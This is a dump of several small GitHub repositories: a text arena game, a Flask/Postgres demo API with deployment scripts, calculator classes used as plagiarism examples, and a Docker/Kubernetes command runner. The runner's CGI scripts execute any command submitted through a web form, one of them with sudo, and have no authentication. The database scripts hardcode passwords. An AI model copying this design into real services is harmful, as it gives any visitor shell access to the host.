"max_line_length": 31,
"num_lines": 6,
"path": "/test.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "import class_methods\nimport classes\n\nbob = classes.Fighter(\"Bob\")\nbob.loot()\nbob.inventory.print_inventory()"
},
{
"alpha_fraction": 0.5988371968269348,
"alphanum_fraction": 0.6220930218696594,
"avg_line_length": 14.727272987365723,
"blob_id": "5b2d0cfd4f2c49b6e0261f6ec259dd122b5da55f",
"content_id": "0ce3e6353b7d8844abb8b22d6c7bd6aff4f68da3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 11,
"path": "/potions_and_items.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines consumables\n\nclass HealthPotion:\n \n name = \"Health Potion\"\n healing_points = 10\n \nclass ManaPotion:\n \n name = \"Mana Potion\"\n mana_points = 10"
},
{
"alpha_fraction": 0.7252916097640991,
"alphanum_fraction": 0.7516881227493286,
"avg_line_length": 39.22222137451172,
"blob_id": "7aeefb671c43af1cb95e8bee120462accc47b3ec",
"content_id": "4e544275fb28d87fa35199a7cda9e38602104fb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3258,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 81,
"path": "/CHANGELOG.md",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "**Changelog**\n\n**Version 0.5** -- 8th update, 10/24/19\n\nAdded more weapons and spells. This update also adds a loot system, where a random item is dropped after every encounter. Different items drop for each class, and the next update will add more weapons/items and a way to equip new weapons from the inventory. \n\n\n**Version 0.42** -- 7th update, 10/21/19\n\nAdded a function to clear the screen before starting the game and improved player death checks.\nMore text display/formatting improvements.\n\n\n**Version 0.41** -- 6th update, 10/20/19\n\nVarious enhancements to the Mage class, such as a dedicated spell screen, and some formatting fixes for combat text output.\n\n\n**Version 0.4** -- 5th update, 10/20/19\n\nPretty big update, this one adds:\n\n Potions\n Some basic AI\n An inventory system\n\nThere are currently two potions in the game, health potions and mana potions. They restore 10 points to their respective stats.\nAll enemies spawn with 1 health potion (or 2 for the final boss), and player classes spawn with 1 health potion (and 2 mana potions if you're a mage.) \n\nThe AI is extremely rudimentary, and all it does is consume a health potion if its health is below 20.\n\nThe inventory can be displayed at the beginning of every turn, and shows the equipped weapon, as well as available potions.\n\n*A small note:* I'm tremendously enjoying working on this game, I think it's the most fun I've had with programming since I started 4 months ago. As soon as I flesh out the base game, I'll work on adding a full GUI to it. \n\n\n**Version 0.3** -- 4th update, 10/19/19\n\nThis update adds general text formatting and text highliting, making everything much prettier to look at. This is done through the \nwonderful <a href=\"https://pypi.org/project/termcolor/\">termcolor</a> library.\n\n\n**Version 0.2** -- 3rd update, 10/19/19\n\nThis update adds all five encounters to the game. I might add more later, but for now I think that five is plenty. \nThe current enemies are, in order:\n\n Weak Swordsman\n Bear\n Seasoned Gladiator\n Basilisk\n Small Dragon\n\nEach enemy has a unique weapon.\n\n\n**Version 0.11** -- 2nd update, 10/19/19\n\nThis update adds functionality to allow mages to cast spells. At the moment, there are only 3 spells: Fireball, Ice Arrow, and Meteor Shower. \nThe player is able to select which spell they would like to cast before attacking each turn.\n\n\n**Version 0.1** -- Initial release, 10/19/19\n\n*Classes*\n\nThe game currently has 3 classes: Fighter, Mage, and Hunter. The Fighter class is fully functional, but the Mage class\nis missing some spell casting abilities, and the Hunter class has not been tested but should work in theory.\n\n*Gameplay Loop*\n\nThe game only has one encounter at the moment, with a Weak Swordsman named Glorb. Glorb has the ability to attack, but that's about it.\nIn future updates I'll give enemies the ability to drink health potions when they are low on health, and switch weapons/spells.\n\n*Items/Weapons*\n\nThere are only 4 weapons right now, with each one being the default for either a player-selectable class or the enemy.\n\n*Styling* \n\nThe styling is non-existent at the moment. I'm definitely going to add colored text, formatting, and the like when I get the core game fleshed out.\n"
},
{
"alpha_fraction": 0.6073883175849915,
"alphanum_fraction": 0.6254295706748962,
"avg_line_length": 18.74576187133789,
"blob_id": "de191968ec4a638e97d4408f9063aa7166f21ca0",
"content_id": "1bc85c79582b9d177e9e3b1b1639364ef4a9b117",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 59,
"path": "/weapons.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "from termcolor import colored, cprint\n\n# This file defines all the available weapons in the game, and their stats\n# Stats: Starting simple, the only stat will be damage\n\nclass Shortsword:\n\n weapon_type = colored(\"shortsword\", \"yellow\")\n damage = 10\n\nclass Longsword:\n \n weapon_type = colored(\"longsword\", \"yellow\")\n damage = 15\n\nclass RustyShortsword:\n\n weapon_type = colored(\"rusty shortsword\", \"yellow\")\n damage = 5\n \nclass WoodenStaff:\n \n weapon_type = colored(\"wooden staff\", \"yellow\")\n damage = 10\n \nclass Longbow:\n \n weapon_type = colored(\"longbow\", \"yellow\")\n damage = 10\n \nclass Crossbow:\n \n weapon_type = colored(\"crossbow\", \"yellow\")\n damage = 15\n \nclass Claws:\n \n weapon_type = colored(\"claws\", \"yellow\")\n damage = 10\n \nclass Morningstar:\n \n weapon_type = colored(\"morningstar\", \"yellow\")\n damage = 13\n \nclass Fangs:\n \n weapon_type = colored(\"fangs\", \"yellow\")\n damage = 12\n \nclass Firebreath:\n \n weapon_type = colored(\"fire breath\", \"yellow\")\n damage = 10\n \nclass Slingshot:\n \n weapon_type = colored(\"slingshot\", \"yellow\")\n damage = 10"
}
] | 11 |
arnavnagayech/Docker-K8s-Command-Runner
|
https://github.com/arnavnagayech/Docker-K8s-Command-Runner
|
14ca1124f0e59147d55f7e578415d0c97a675acb
|
be185df52cdef69543c0dafd278d0045bb6cbfb5
|
12fddc177f9d9a29fe0781053bd546770936290d
|
refs/heads/main
| 2023-06-30T17:04:01.767887 | 2021-08-04T13:10:50 | 2021-08-04T13:10:50 | 389,492,043 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6417322754859924,
"alphanum_fraction": 0.6456692814826965,
"avg_line_length": 14,
"blob_id": "7e9365d3672ffaa50cef555ad89aa808feb79f1d",
"content_id": "d31a0185cd11c7c3dfd1813d260fc42049bcf5e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 16,
"path": "/docker/docker.py",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\r\n\r\nimport cgi , subprocess\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\na = cgi.FieldStorage()\r\ncmd = a.getvalue(\"s\")\r\n\r\nif \"kubectl\" in cmd:\r\n\to= subprocess.getoutput(\"sudo \"+ cmd)\r\nelse:\r\n\to = subprocess.getoutput(cmd)\r\n\r\nprint(o)"
},
{
"alpha_fraction": 0.654411792755127,
"alphanum_fraction": 0.658088207244873,
"avg_line_length": 15.125,
"blob_id": "c6d4fa8d62b7c774dada2cdcbbfe14f9dedc7ef8",
"content_id": "68707d6f445defed5d3d4498d4e4d12a9088b45d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 16,
"path": "/K8s/k8s.py",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\r\n\r\nimport cgi , subprocess\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\na = cgi.FieldStorage()\r\ncmd = a.getvalue(\"s\")\r\n\r\nif \"kubectl\" in cmd:\r\n\to= subprocess.getoutput(cmd+\" --kubeconfig admin.conf\")\r\nelse:\r\n\to = subprocess.getoutput(cmd)\r\n\r\nprint(o)"
},
{
"alpha_fraction": 0.7018425464630127,
"alphanum_fraction": 0.785594642162323,
"avg_line_length": 41.64285659790039,
"blob_id": "192be40cd0c456f6713d1ac35e97f18d948b3a7b",
"content_id": "b56c57f7339ad8ef68bf6af3d89f141654be225b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 14,
"path": "/README.md",
"repo_name": "arnavnagayech/Docker-K8s-Command-Runner",
"src_encoding": "UTF-8",
"text": "# Docker-K8s-Command-Runner\n\nThis is an application which runs Docker & Kubernetes commands & show output on browser.\n\nIn RedHat Linux 8, Docker , Kubernetes & used services like Httpd & python CGI.\n\n\nBlog For docker -> https://arnavnagayechlinuxworldtasks.wordpress.com/2021/06/25/task-7-1/\n\n\n\n\n\nBlog For K8s -> https://arnavnagayechlinuxworldtasks.wordpress.com/2021/06/30/task-9/\n"
}
] | 3 |
alejovicu/py-automation-example
|
https://github.com/alejovicu/py-automation-example
|
a9d4c68555a917b2b779a258d1102efbfcfe5dd7
|
f054a0b29636a70f4768423104f3e658c857ce88
|
b8e89c92a375e311efaaccc49621a7040cea932d
|
refs/heads/master
| 2020-04-06T19:06:39.054064 | 2018-12-07T18:12:27 | 2018-12-07T18:12:27 | 157,726,068 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7094017267227173,
"avg_line_length": 28.375,
"blob_id": "36df3d9b2eb1844d4a8319f950af6a47ea0e0852",
"content_id": "f9ce280cb2aa8699d2f4e2d8dfb032d9fba8341f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 8,
"path": "/api/test-api.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker run --rm --link py-api:py-api byrnedo/alpine-curl http://py-api:5000/user/\n\ndocker rm -f test-api\ndocker run -d --name=test-api --link py-api:py-api flask-api\ndocker exec -i test-api behave\ndocker rm -f test-api"
},
{
"alpha_fraction": 0.5556994676589966,
"alphanum_fraction": 0.5608808398246765,
"avg_line_length": 21.05714225769043,
"blob_id": "78334fdd397320f107f2fa0f85b75ec26677258d",
"content_id": "e94a5c608c543efb499e36ab8523906d51eb6052",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 35,
"path": "/api/flask_web/connect_db.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport json\nimport psycopg2\nfrom config import config\n \ndef getAllUsers():\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n users = []\n try:\n params = config()\n conn = psycopg2.connect(**params)\n\n cur = conn.cursor()\n\n cur.execute('SELECT * FROM public.user')\n columns = ('user_id', 'name')\n \n for row in cur.fetchall():\n users.append(dict(zip(columns, row)))\n \n cur.close()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n \n return json.dumps(users, indent=2)\n \n \nif __name__ == '__main__':\n connect()\n"
},
{
"alpha_fraction": 0.7701149582862854,
"alphanum_fraction": 0.8160919547080994,
"avg_line_length": 13.5,
"blob_id": "9e39cd5f1c4103eaf243f56a36bfcb33da087caf",
"content_id": "f0c733b008793dc8bd5861862e8dead816f72429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 6,
"path": "/api/flask_web/database.ini",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "[postgresql]\nhost=db\nport=5432\ndatabase=api-database\nuser=postgres\npassword=astrongpass\n"
},
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.7010869383811951,
"avg_line_length": 35.79999923706055,
"blob_id": "6a0f50d85f4e80f2c6a47d655c24ad614b0c2c76",
"content_id": "96f474d9cba84ff6f765529f89a3cbe107e26a8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 5,
"path": "/db/deploy-db-admin.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker rm -f db-admin\n\ndocker run --name db-admin -p 8080:80 --link db:db -e \"[email protected]\" -e \"PGADMIN_DEFAULT_PASSWORD=admin\" -d dpage/pgadmin4\n"
},
{
"alpha_fraction": 0.6931408047676086,
"alphanum_fraction": 0.6931408047676086,
"avg_line_length": 20.30769157409668,
"blob_id": "deab9ce2ab766e60def71462d369404155000c49",
"content_id": "34acabd98364e6e4d0ff779b9809541076b17c95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/api/integration-tests/features/steps/users_steps.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "from behave import given, when, then, step\n\n@given('The users API is up')\ndef is_user_api_up(context):\n pass\n\n@when('I call the user api to list the users')\ndef call_users_api(context):\n pass\n\n@then('I expect to see the users')\ndef validate_users_list(context):\n pass\n"
},
{
"alpha_fraction": 0.6461538672447205,
"alphanum_fraction": 0.6461538672447205,
"avg_line_length": 8.428571701049805,
"blob_id": "2c7cb15e4fe31d7b6f8c45c993b9f94f7a9d4d92",
"content_id": "e4ea530eb1a30b16d73f21148b646c0bbf389caa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 7,
"path": "/deploy.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ncd db\nsh deploy-db.sh\n\ncd ../api\nsh deploy-api.sh"
},
{
"alpha_fraction": 0.7134146094322205,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 26.41666603088379,
"blob_id": "271dcb8fbe5f69608de41627d13d8d3b280cdeb4",
"content_id": "5d6e97b7e7797ad972ef7c88d940a90d54539df2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 328,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 12,
"path": "/db/deploy-db.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\ndocker rm -f db\n\ndocker run --name db -e POSTGRES_PASSWORD=astrongpass -d postgres\n\necho \"Wait for db service up...\"\nsleep 15\n\ncat data/create-db.sql | docker exec -i db psql -U postgres\ncat data/create-schema.sql | docker exec -i db psql -U postgres\ncat data/insert-users.sql | docker exec -i db psql -U postgres"
},
{
"alpha_fraction": 0.5982906222343445,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 18.5,
"blob_id": "54fa88e8dfd00507fdb564c7e1a926844a4be8c2",
"content_id": "619eca9bc8592c5e18d99d8937beb62660339857",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/api/deploy-api-local.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\n\nsh build-api.sh\n\ndocker rm -f py-api\ndocker run -d --name=py-api -p 5000:5000 --link db:db flask-api\n"
},
{
"alpha_fraction": 0.7091836929321289,
"alphanum_fraction": 0.7091836929321289,
"avg_line_length": 13,
"blob_id": "4e529c2d234d058762f3160f34a5c4a9c4195a59",
"content_id": "4ef5da24ad894d31d024a5475feff4e59bbf4b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/api/Dockerfile",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "FROM python\n\nCOPY ./dependencies /app/dependencies\n\nWORKDIR /app\n\nRUN pip install -r dependencies\n\nCOPY ./flask_web/ /app\nCOPY ./integration-tests/ /app\n\nENTRYPOINT [ \"python\" ]\n\nCMD [ \"app.py\" ]\n"
},
{
"alpha_fraction": 0.6611111164093018,
"alphanum_fraction": 0.6722221970558167,
"avg_line_length": 21.5,
"blob_id": "aded44cf47b9936b25b6813c7b71a0a848815ad6",
"content_id": "44992dbd6d472d0eeaf5e90073fb5b373fcf742c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/api/flask_web/app.py",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "from flask import (\n Flask,\n render_template\n)\nfrom connect_db import getAllUsers\n\n# Create the application instance\napp = Flask(__name__, template_folder=\"templates\")\n\[email protected]('/user/')\ndef user():\n return getAllUsers()\n\n# If we're running in stand alone mode, run the application\nif __name__ == '__main__':\n app.run(debug=True,host='0.0.0.0')\n"
},
{
"alpha_fraction": 0.737500011920929,
"alphanum_fraction": 0.737500011920929,
"avg_line_length": 19,
"blob_id": "0888f4409b7dfb412397e71b5b58421a016b1a9e",
"content_id": "095c2c81cb46bc15f28e52f384ede71c92c91d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 8,
"path": "/README.md",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "# py-automation-example\n\nExample of automated tests for an api\nStack:\n* db: postgres\n* api: flask (python)\n* automation framework: behave (python)\n* ci: travis\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 24,
"blob_id": "088c2b946aaa6c556677bad09f497bedd9d3e1eb",
"content_id": "d632172dbe5842e2a72ddfa5cf202118ce3a76d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/api/build-api.sh",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/sh\ndocker build -t flask-api:latest .\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 59.20000076293945,
"blob_id": "8f750e90c5406b6b8813a5412ab8aa1b4a7dc6c0",
"content_id": "77b5b8d7248068829303f3d8cea9894c447bf5a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 5,
"path": "/db/data/insert-users.sql",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "\\c \"api-database\";\n\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'alejandro' );\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'luisa' );\nINSERT INTO public.\"user\" (\tuser_id, name ) VALUES ( nextval('public.seq_user'), 'martin' );"
},
{
"alpha_fraction": 0.6575682163238525,
"alphanum_fraction": 0.6650124192237854,
"avg_line_length": 15.791666984558105,
"blob_id": "6a6b62a321445fa80d7f23b10af3516c292fca4c",
"content_id": "dcd79e9e52ae699f994447473ffe97605891ef0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 403,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 24,
"path": "/db/data/create-schema.sql",
"repo_name": "alejovicu/py-automation-example",
"src_encoding": "UTF-8",
"text": "\\c \"api-database\";\n\nCREATE SEQUENCE public.seq_user\n INCREMENT 1\n START 1\n MINVALUE 1\n;\n\nCREATE TABLE public.\"user\"\n(\n user_id serial NOT NULL,\n name character varying NOT NULL,\n PRIMARY KEY (user_id)\n)\nWITH (\n OIDS = FALSE\n);\n\nALTER TABLE public.\"user\"\n OWNER to postgres;\n\nALTER TABLE ONLY public.\"user\"\n ALTER COLUMN user_id \n SET DEFAULT nextval('seq_user'::regclass);\n"
}
] | 14 |
rvsia/plagiarism-source-code-examples
|
https://github.com/rvsia/plagiarism-source-code-examples
|
9ce730e9f840c8a79821c582a07d27295d786ee4
|
dd2fe3a06b69e5b7b873be25e35e8fab0492c6b3
|
47e7bf2f62089ec982c770b7ba2a30628816858d
|
refs/heads/master
| 2020-04-17T19:48:13.238358 | 2019-02-17T20:00:16 | 2019-02-17T20:00:16 | 166,879,343 | 0 | 0 | null | 2019-01-21T20:54:46 | 2019-02-10T20:30:51 | 2019-02-10T20:38:28 |
C++
|
[
{
"alpha_fraction": 0.5967620611190796,
"alphanum_fraction": 0.6080572009086609,
"avg_line_length": 25.04901885986328,
"blob_id": "139d2aa3c2972870df5638af82dd84e3194d4125",
"content_id": "d0c8a7280813046577e33a013369895afb619d08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2656,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 102,
"path": "/php/Calculator.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// History of $results\n\tprivate $history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($fileName = '') {\n\t\t$this->loadHistoryFromFile($fileName);\n\t\t$this->print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function addition($number1, $number2) {\n\t\t$result = $number1 + $number2;\n\t\t$this->print(\"Result od addition is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function substraction( $number1, $number2) {\n\t\t$result = $number1 - $number2;\n\t\t$this->print(\"Result od substraction is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function multiplication( $number1, $number2) {\n\t\t$result = $number1 * $number2;\n\t\t$this->print(\"Result od multiplication is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function division( $number1, $number2) {\n\t\t$result = $number1 / $number2;\n\t\t$this->print(\"Result od division is \" . $result);\n\t\t$this->addToHistory($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to history array\n\tprivate function addToHistory($item) {\n array_push($this->history, $item);\n\t}\n\t\n\t// Print the whole history\n\tpublic function printHistory() {\n\t\tforeach ( $this->history as $result) {\n\t\t\t$this->print($result);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function compareNumbers( $number1, $number2) {\n\t\tif ($number1 > $number2) {\n\t\t\t$this->print($number1 . \" is bigger than \" . $number2);\n\t\t} else if ($number2 > $number1) {\n\t\t\t$this->print($number1 . \" is smaller than \" . $number2);\n\t\t} else {\n\t\t\t$this->print($number1 . \" is the same as \" . $number2);\n\t\t}\n\t}\n\t\n\t// Adds $results to history\n\tpublic function loadHistoryFromFile($fileName) {\n if($fileName !== '')\n try {\n\t\t\t$file = fopen($fileName, \"r\");\n $readLine = \"\";\n while (($readLine = fgets($file)) !== false) {\n $this->addToHistory($readLine);\n }\n fclose($file);\n $this->print(\"History form file was loaded!\");\n\t\t} catch (Exception $e) {\n\t\t\t$this->print(\"File could not be loaded! Because:\" . $e);\n\t\t}\n\t}\n\t\n\t// Returns if number is odd\n\tpublic function isOdd( $number) {\n\t\t$boolIsOdd = ($number/2) != 0;\n\t\tswitch ($boolIsOdd) {\n\t\t\tcase true:\n\t\t\t\t$this->print($number . \" is odd!\");\n\t\t\t\treturn true;\n\t\t\tcase false: \n\t\t\t\t$this->print($number . \" is not odd!\");\n\t\t\t\treturn false;\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.5577388405799866,
"alphanum_fraction": 0.566807746887207,
"avg_line_length": 28.026315689086914,
"blob_id": "8f26d4015e411f0039534ebd7a6fc6e7d0432e17",
"content_id": "a6c276ebe364ea132522c8536e95b08c14523a99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3308,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 114,
"path": "/c++/Calculator.1.cpp",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <string>\n#include <vector>\n#include <chrono>\n#include <ctime>\n#include <fstream>\n\nusing namespace std;\n\n// Computer class\nclass Computer {\n // records of results\nprivate: vector<float> records;\n\n // Constructor for loading results from file\n public: Computer(string path) {\n pushResultsData(path);\n log(\"Computer was created\");\n }\n \n Computer() {\n log(\"Computer was created\");\n }\n\n // Prints content with current time\n public: void log(string content) {\n std::time_t time = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());\n std::cout << \"# \" << std::ctime(&time) << \" # \" << content;\n }\n\n // Adds two numbers\n public: float plus(float numeral1, float numeral2) {\n float outcome = numeral1 + numeral2;\n log(\"outcome od plus is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Subtracts two numbers\n public: float minus(float numeral1, float numeral2) {\n float outcome = numeral1 - numeral2;\n log(\"outcome od minus is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n\n // Multiplies two numbers\n public: float multiply(float numeral1, float numeral2) {\n float outcome = numeral1 * numeral2;\n log(\"outcome od multiply is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Divides two numbers\n public: float divide(float numeral1, float numeral2) {\n float outcome = numeral1 / numeral2;\n log(\"outcome od divide is \" + to_string(outcome));\n pushResult(outcome);\n return outcome;\n }\n\n // Adds outcome to records array\n private: void pushResult(float element) {\n records.push_back(element);\n }\n\n // log the whole records\n public: void logResults() {\n for (float outcome: records) {\n log(to_string(outcome));\n }\n }\n\n // Compare two numbers\n public: void comparisonNumerals(float numeral1, float numeral2) {\n if (numeral1 > numeral2) {\n log(to_string(numeral1) + \" is bigger than \" + to_string(numeral2));\n } else if (numeral2 > numeral1) {\n log(to_string(numeral1) + \" is smaller than \" + to_string(numeral2));\n } else {\n log(to_string(numeral1) + \" is the same as \" + to_string(numeral2));\n }\n }\n\n // Adds results to records\n public: void pushResultsData(string path) {\n try {\n std::ifstream data(path);\n string row = \"\";\n while (getline(data, row)) {\n pushResult(stof(row));\n }\n data.close();\n log(\"records form file was loaded!\");\n } catch (const std::exception& error) {\n log(\"File could not be loaded! Because:\" + std::string(error.what()));\n }\n }\n\n // Returns if numeral is odd\n public: bool uneven(float numeral) {\n bool booleanUneven = (numeral/2) != 0;\n switch (booleanUneven) {\n case true:\n log(to_string(numeral) + \" is odd!\");\n return true;\n case false:\n log(to_string(numeral) + \" is not odd!\");\n return false;\n }\n }\n};"
},
{
"alpha_fraction": 0.5811293721199036,
"alphanum_fraction": 0.5918512940406799,
"avg_line_length": 26.441177368164062,
"blob_id": "5df6afd16bdea2dd46bad658d45fe454da6a8cdf",
"content_id": "dabcd1e4e30b66c270a12e4224e5b84ed1fe1a0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2798,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 102,
"path": "/php/Calculator.2.php",
"repo_name": "rvsia/plagiarism-source-code-examples",
"src_encoding": "UTF-8",
"text": "<?php\nclass Calculator {\n\t// m_history of $results\n\tprivate $m_history = array();\n\t\n\t// Constructor for loading results from file\n\tpublic function __construct($file_name = '') {\n\t\t$this->load_history_from_file($file_name);\n\t\t$this->f_print(\"Calculator was created\");\n\t}\n\t\n\t// Prints text with current date\n\tpublic function f_print($text) {\n\t\t$date = date('m/d/Y h:i:s a', time());\n\t echo \"# \" . $date . \" # \" . $text;\n\t}\n\t\n\t// Adds two numbers\n\tpublic function f_addition($number_1, $number_2) {\n\t\t$result = $number_1 + $number_2;\n\t\t$this->f_print(\"Result od f_addition is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Subtracts two numbers\n\tpublic function f_substraction( $number_1, $number_2) {\n\t\t$result = $number_1 - $number_2;\n\t\t$this->f_print(\"Result od f_substraction is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t\n\t// Multiplies two numbers\n\tpublic function f_multiplication( $number_1, $number_2) {\n\t\t$result = $number_1 * $number_2;\n\t\t$this->f_print(\"Result od f_multiplication is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Divides two numbers\n\tpublic function f_division( $number_1, $number_2) {\n\t\t$result = $number_1 / $number_2;\n\t\t$this->f_print(\"Result od f_division is \" . $result);\n\t\t$this->add_to_history($result);\n\t\treturn $result;\n\t}\n\t\n\t// Adds $result to m_history array\n\tprivate function add_to_history($l_item) {\n array_push($this->m_history, $l_item);\n\t}\n\t\n\t// f_print the whole m_history\n\tpublic function print_history() {\n\t\tforeach ( $this->m_history as $result) {\n\t\t\t$this->f_print($result);\n\t\t}\n\t}\n\t\n\t// Compare two numbers\n\tpublic function compare_numbers( $number_1, $number_2) {\n\t\tif ($number_1 > $number_2) {\n\t\t\t$this->f_print($number_1 . \" is bigger than \" . $number_2);\n\t\t} else if ($number_2 > 